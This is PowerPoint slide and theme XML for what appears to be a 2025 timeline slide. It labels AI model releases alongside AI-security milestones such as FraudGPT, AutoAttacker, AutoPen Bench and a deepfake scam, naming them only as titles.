                  <a:cubicBezTo>
                    <a:pt x="1804540" y="206761"/>
                    <a:pt x="1839860" y="293249"/>
                    <a:pt x="1839860" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1839860" y="431821"/>
                    <a:pt x="1837085" y="461600"/>
                    <a:pt x="1831511" y="489482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811977" y="580610"/>
                    <a:pt x="1763607" y="649456"/>
                    <a:pt x="1686412" y="692212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1631559" y="722902"/>
                    <a:pt x="1564597" y="736863"/>
                    <a:pt x="1475304" y="736863"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="750838" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="832594" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832594" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="99437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="140311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597510" y="669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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Textfeld 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B527B144-B67B-89BB-E3E6-902F602C929C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-602000" y="1420125"/>
            <a:ext cx="3240360" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Multimodal GPT-4V</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8DC396A-FDE6-469A-81DF-1F435EAC1CF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-64045" y="5011141"/>
            <a:ext cx="3060340" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Worm- / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FraudGPT</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Textfeld 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E5D9D6-3BE2-481B-4505-4553E5054EBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2576584" y="1420125"/>
            <a:ext cx="3240360" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gemini 2.5 Pro Exp.</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Textfeld 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A82D52F2-43BF-14CD-BD6F-DB97C5E72E66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2376164" y="5011141"/>
            <a:ext cx="3060340" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DeepSeek-V3 / R1</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Textfeld 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C01E35A-C66B-3972-8E2C-BF9474BFFA4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3246096" y="3136612"/>
            <a:ext cx="1283067" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-AT" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2025</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Textfeld 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17099444-7338-58FC-580A-B9872632AC5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1379352" y="1420125"/>
            <a:ext cx="3240360" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LLama3</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Textfeld 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{945533FC-C189-2756-B7AD-3D9FEF1138F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2673154" y="5069456"/>
            <a:ext cx="3176973" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>25M$ Deepfake Scam</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Textfeld 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EF9D96E-19C3-10E9-C7ED-127F2110E855}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-538011" y="5011141"/>
            <a:ext cx="3060340" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whitehouse AI Comm.</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Textfeld 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40E73ECA-97C3-E47A-072D-324ADCBDD641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="104162" y="1428742"/>
            <a:ext cx="3240360" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UK AISI Evaluations</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Textfeld 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F50790E-9A30-3F37-DD23-EA0B3F1432CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="409662" y="5002525"/>
            <a:ext cx="3060340" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AI Cyberthreat UK NCSC</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Textfeld 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{121FB4DF-AC6B-7205-8F30-5D35C2E39062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="511876" y="1394256"/>
            <a:ext cx="3240360" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AutoAttacker</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Textfeld 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AC08C0D-26FF-2D8B-1311-EC6226AFA406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-250438" y="1428741"/>
            <a:ext cx="3240360" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gemini 1.5</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Textfeld 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43FDEADD-DEFF-29D0-94DB-6029C82CBC8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1275976" y="5002525"/>
            <a:ext cx="3060340" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GPT o1</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Textfeld 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{041564DD-423C-0C66-3653-235BB291727E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1631282" y="5002525"/>
            <a:ext cx="3060340" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gemini 2.0 Flash</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Textfeld 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55AC07A8-7F4F-DCFF-2230-FEDE6C6A5818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2155389" y="1428741"/>
            <a:ext cx="3240360" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Qwen 3</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Textfeld 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68B88A3A-0BED-BE7B-97D7-B3076E2CF8A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1734194" y="1437356"/>
            <a:ext cx="3240360" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GPT o3 &amp; o4-mini</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Textfeld 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{510238CA-D80E-F5BA-2AB4-C20AC87C0E75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="827556" y="5017762"/>
            <a:ext cx="3060340" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SpearPhishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Eval</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Textfeld 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F55963-31F4-0862-C5AE-740E050E632C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="946066" y="1394256"/>
            <a:ext cx="3240360" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LLMs as Hackers</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Textfeld 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123A435D-8701-4974-399E-5C77993CC970}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2005737" y="4984153"/>
            <a:ext cx="3060340" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AutoPen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Bench</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2995615310"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="A1Digital">
  <a:themeElements>
    <a:clrScheme name="Office">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="333333"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F2F2F2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="DA291C"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="6295AC"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="BCBCBC"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="999999"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="666666"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F2F2F2"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="333333"/>
      </a:hlink>
